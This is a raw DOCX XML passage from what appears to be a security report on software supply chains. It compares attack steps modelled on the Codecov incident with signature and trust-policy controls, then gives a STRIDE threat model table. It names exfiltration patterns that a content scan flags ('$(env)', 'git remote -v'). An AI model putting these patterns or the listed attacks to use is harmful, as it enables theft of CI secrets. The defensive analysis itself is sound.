              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The checksum is inside the signed manifest, so changing it breaks the manifest signature: INVALID_SIGNATURE.</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Attacker re-signs with own key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The key is not in the root-signed trust policy (UNAUTHORIZED_KEY). Editing the trust policy breaks the root signature (INVALID_TRUST_POLICY).</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File served over valid HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TLS 1.3 is still used, but trust comes from signatures, so the gate blocks regardless of the channel.</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Script executes in customer CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">It never executes: the gate runs before use and exits 1. The content scan also flags </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$(env)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>git remote -v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> exfiltration.</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Undetected for about 2 months</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Detection is automatic on the first download by every customer. Each block raises a security event and an audit record.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.2 Threat Model (STRIDE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Threats were identified with Microsoft's STRIDE method [14] (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege). For each threat the table documents Asset → Threat → Attack → Vulnerability → Security control → Expected result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 6.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>STRIDE threat model</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1360"/>
        <w:gridCol w:w="1247"/>
        <w:gridCol w:w="1530"/>
        <w:gridCol w:w="1530"/>
        <w:gridCol w:w="1927"/>
        <w:gridCol w:w="1360"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Expected result</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Released artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Modify file in storage (Codecov)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Storage credential can change release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SHA-256 in signed manifest; Ed25519 artifact signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HASH_MISMATCH → BLOCK</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Build server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampering, EoP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inject code during build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unverified build output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security tests; provenance (builder, build ID, source hash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Build stopped / INVALID_PROVENANCE</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Artifact repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Replace artifact and checksum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Checksum stored beside artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Signed manifest; keys only from trust policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>INVALID_SIGNATURE → BLOCK</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Signing key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Info. disclosure → Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Steal private key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Key in plain file / CI secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Encrypted store / HSM, MFA signing, content scan, revocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POLICY_VIOLATION, then REVOKED</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Signer identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Own key or forged key_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Any signature accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Trust-policy key list; verify with listed key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>UNAUTHORIZED_KEY / INVALID_SIGNATURE</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Download channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampering, Info. disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>MITM, TLS downgrade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP or legacy TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TLS 1.3 only, CA-validated certificate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Handshake refused</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Customer deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampering (replay)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Serve old vulnerable signed version</w:t>
            </w:r>
          </w:p>
